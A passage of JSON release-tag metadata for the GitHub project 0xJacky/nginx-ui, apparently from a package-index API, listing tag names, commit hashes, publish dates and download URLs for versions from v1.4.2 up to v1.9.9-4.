nginx-ui/tags/v1.9.9-4/manifests"},{"name":"v1.9.9-3","sha":"9ac5708ecad97bdbcb71bc3c784203e3a35aaf21","kind":"commit","published_at":"2023-05-06T02:53:08.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.9.9-3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.9.9-3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.9.9-3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.9.9-3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.9.9-3/manifests"},{"name":"v1.9.9-2","sha":"5b34f0f052773ca5c6da47d4b56d5c467ac06c6c","kind":"commit","published_at":"2023-05-05T13:05:28.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.9.9-2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.9.9-2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.9.9-2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.9.9-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.9.9-2/manifests"},{"name":"v1.9.9","sha":"c16ea53ed119e1cc6e7798a72cd8058f6dff2f41","kind":"commit","published_at":"2023-05-05T12:20:03.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.9.9","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.9.9/manifests"},{"name":"v1.9.9-1","sha":"eab95dd09100b7d771e2b6970174fb5706a672ed","kind":"commit","published_at":"2023-05-02T02:43:33.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.9.9-1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.9.9-1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.9.9-1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.9.9-1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.9.9-1/manifests"},{"name":"v1.8.4-patch","sha":"ca3c9946ce8504f08ba2888c6e4dbbfefeff52ff","kind":"commit","published_at":"2023-05-01T05:55:26.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.8.4-patch","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.8.4-patch","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.8.4-patch","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.4-patch","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.4-patch/manifests"},{"name":"v1.8.4","sha":"6b640381e80915177d2da9db071959827a3a0c3d","kind":"commit","published_at":"2023-05-01T05:39:23.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.8.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"26938ae1bbdecbf76015f2e7747940b1577aeb16","kind":"commit","published_at":"2023-04-23T16:03:28.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.8.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"4c722b9e64691f20112d34e8b255d654e7d9a3ef","kind":"commit","published_at":"2023-04-21T07:39:07.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.8.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"f455cf13b8138248bc6bb4ccb6c08c2d43d652cd","kind":"commit","published_at":"2023-04-21T03:31:05.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.8.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"a43b99feb9bd3d830a727ba0c16fb99259d52284","kind":"commit","published_at":"2023-04-17T06:58:50.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.8.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.8.0/manifests"},{"name":"v1.7.9","sha":"1bc8d0a4a94054a901b713458f86ef0b8282e905","kind":"commit","published_at":"2023-04-04T13:40:50.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.9","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.9/manifests"},{"name":"v1.7.8","sha":"5d0407ed0727a5d986a427a8f6781ffe78eba17c","kind":"commit","published_at":"2023-03-22T01:21:09.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.8","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.8/manifests"},{"name":"v1.7.7","sha":"394bd0e578388d7a42c19572ab958d388a484f7f","kind":"commit","published_at":"2023-03-13T13:51:28.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.7","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.7/manifests"},{"name":"v1.7.6","sha":"705d71d3b7f79c9f9ecb9e63a6d212fe791c6d2e","kind":"commit","published_at":"2023-02-15T05:17:32.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.6","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.6/manifests"},{"name":"v1.7.5","sha":"cba0028c4fb9ad170802f7260675eb538707c783","kind":"commit","published_at":"2023-02-04T14:22:39.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"83883c1ab9bffa7ca15427ca041ee7ad6f07e5db","kind":"commit","published_at":"2023-01-31T15:59:11.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"561771cf10bfd9fa8ec680855daca43031d36bf6","kind":"commit","published_at":"2023-01-28T11:37:30.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"02fb07f6b4885c599e84077078e095a1007dae61","kind":"commit","published_at":"2023-01-11T06:05:51.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"41ced2ea05f188de573b8b39299db5b92e2f9449","kind":"commit","published_at":"2023-01-07T17:21:19.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.1/manifests"},{"name":"v1.7.0-patch","sha":"6c74ad4a01dc3766997b633c96aafdb27a422b1f","kind":"commit","published_at":"2023-01-05T15:30:14.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.0-patch","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.0-patch","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.0-patch","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.0-patch","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.0-patch/manifests"},{"name":"v1.7.0","sha":"adb6f888d29c459d8414ef01fd15d8be3403f1bf","kind":"commit","published_at":"2023-01-05T14:59:40.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.7.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.7.0/manifests"},{"name":"v1.6.8","sha":"d7ce452b8b4c243eda42b53bf6785ef332dce6b7","kind":"commit","published_at":"2022-12-04T14:05:39.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.6.8","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.8/manifests"},{"name":"v1.6.7","sha":"133a0e9501c0a3a0e17727efffeafc23be0b60f9","kind":"commit","published_at":"2022-11-28T14:12:42.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.6.7","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.7/manifests"},{"name":"v1.6.6","sha":"4bce9025af36d89f6808e81dda9247b225fe838e","kind":"commit","published_at":"2022-11-12T16:26:09.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.6.6","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.6/manifests"},{"name":"v1.6.5","sha":"33064693a693dfbe5690eafe620a0e343c430526","kind":"commit","published_at":"2022-11-05T02:51:50.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.6.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.5/manifests"},{"name":"v1.6.3","sha":"c4f87fb4cc49344aec657ff6b3c1ab49a940d170","kind":"commit","published_at":"2022-10-21T06:48:14.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.6.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.3/manifests"},{"name":"v1.6.2","sha":"909f7380b661d150382fec5e221aeca45c0a44f2","kind":"commit","published_at":"2022-09-24T16:35:28.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.6.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.2/manifests"},{"name":"v1.6.1","sha":"92fb679b550c03f64394160e1bf5fb4377459862","kind":"commit","published_at":"2022-09-02T10:39:05.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.6.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.1/manifests"},{"name":"v1.6.0-fix","sha":"6dce44a3ccad814deb650f7f744c21f2df9cbd71","kind":"commit","published_at":"2022-09-01T03:10:13.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.6.0-fix","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.6.0-fix","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.6.0-fix","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.0-fix","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.0-fix/manifests"},{"name":"v1.6.0","sha":"f85aa7a9e9cf19f4bb0656059d2b25ecfb9b6b2e","kind":"commit","published_at":"2022-09-01T03:06:41.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.6.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.6.0/manifests"},{"name":"v1.5.2","sha":"2d4c15e7f9777504b26e0a82893d7e07a1f83523","kind":"commit","published_at":"2022-08-18T09:10:49.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"1dc5f716885ae8e0d45588431fa30bce04de7e1e","kind":"commit","published_at":"2022-08-17T15:36:23.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0c0594a7ee218f50f25c11da16647fe019f6a3e4","kind":"commit","published_at":"2022-08-12T08:30:45.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0/manifests"},{"name":"v1.5.0-beta9","sha":"e28e46db320c233699aea56c4061a29c0baff9c3","kind":"commit","published_at":"2022-08-11T16:23:42.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0-beta9","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta9/manifests"},{"name":"v1.5.0-beta8","sha":"b5f20c62bc501446cbbe926ee719884a15da8cb4","kind":"commit","published_at":"2022-08-07T12:10:04.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0-beta8","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta8/manifests"},{"name":"v1.5.0-beta7","sha":"33481774702bac98a1beb2c8a5d05db78f7b57c0","kind":"commit","published_at":"2022-08-06T04:03:55.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0-beta7","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta7/manifests"},{"name":"v1.5.0-beta6","sha":"c5a59eed948f957bce7f3ae92bc3f6ce96acf8bd","kind":"commit","published_at":"2022-08-05T14:16:18.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0-beta6","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta6/manifests"},{"name":"v1.5.0-beta5","sha":"7849ef76bcb6a73f041addae4125650233237c6b","kind":"commit","published_at":"2022-08-04T07:02:33.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0-beta5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta5/manifests"},{"name":"v1.5.0-beta4-fix","sha":"3fef0cf2ac35b1ee396305e774ae934df35ea553","kind":"commit","published_at":"2022-08-03T04:08:02.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0-beta4-fix","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0-beta4-fix","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0-beta4-fix","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta4-fix","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta4-fix/manifests"},{"name":"v1.5.0-beta4","sha":"a725cd7f88b4d6f8a6f129b9c9fab3ae9ad40648","kind":"commit","published_at":"2022-08-03T04:01:59.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0-beta4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta4/manifests"},{"name":"v1.5.0-beta3","sha":"a5b23d569c0a0310d0cdc5992bcca0299999a80b","kind":"commit","published_at":"2022-08-02T08:58:59.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0-beta3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta3/manifests"},{"name":"v1.5.0-beta2","sha":"34fc0a23cab89c9521cd7bb4436cb6631cc3d031","kind":"commit","published_at":"2022-08-02T06:15:52.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0-beta2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta2/manifests"},{"name":"v1.5.0-beta1","sha":"d6a5bfc46a7f0ee285bd1a2e144befcfa1532317","kind":"commit","published_at":"2022-07-28T06:36:53.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.5.0-beta1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.5.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.5.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.5.0-beta1/manifests"},{"name":"v1.4.2","sha":"70e3f2d